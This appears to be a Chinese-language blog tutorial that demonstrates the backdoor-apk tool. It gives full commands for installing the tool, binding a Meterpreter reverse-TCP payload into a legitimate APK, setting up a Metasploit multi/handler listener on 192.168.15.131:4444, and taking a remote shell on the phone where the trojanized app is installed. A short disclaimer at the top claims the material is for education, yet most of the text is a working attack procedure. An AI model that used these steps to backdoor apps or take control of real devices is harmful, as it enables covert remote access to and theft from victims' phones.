文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用
backdoor-apk 从名字上我们就能知道它的用途了,没错就是用来制作 APK 后门的。这款工具使用起来非常方便,而且功能也很强大!话不多说,下面我们直接进入正题。
首先,让我们对它进行安装,在安装前我们需要先安装它的一些依赖 lib 库文件:
apt-get install lib32stdc++6 lib32ncurses5 lib32z1
这里询问我们,对这些安装的服务,当他们更新时不再进行询问。我们选择 Yes 即可!
在完成以上依赖库的安装后接着我们就可以安装 backdoor-apk 啦!
git clone https://github.com/dana-at-cp/backdoor-apk.git
下载完成后我们进入到其文件目录下:
cd backdoor-apk/
cd backdoor-apk/
在当前目录下,我们可以看到一个脚本文件。这里,我们需要提前准备一个用来绑定后门的 APK 文件。
./backdoor-apk.sh /root/secist.apk
选择 3 payload
LHOST:192.168.15.131
LPORT:4444
成功执行以上操作后,会生成一个绑定后门的 secist.apk 文件,默认被保存在 backdoor-apk>>original>>dist 目录下!下面我们来启动侦听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
同时,我将生成的带有后门的 APK 发送至我的手机,并进行安装打开!
很快我们可以看到,我已经取得了手机的 meterpreter shell !
简单输入一个,查看系统信息的命令:
sysinfo
可以看到目标系统为 安卓6 版本,内核为 linux 3.10.49 架构为 armv7l 。
转载请注明:即刻安全 » 安卓后门之backdoor-apk实例演示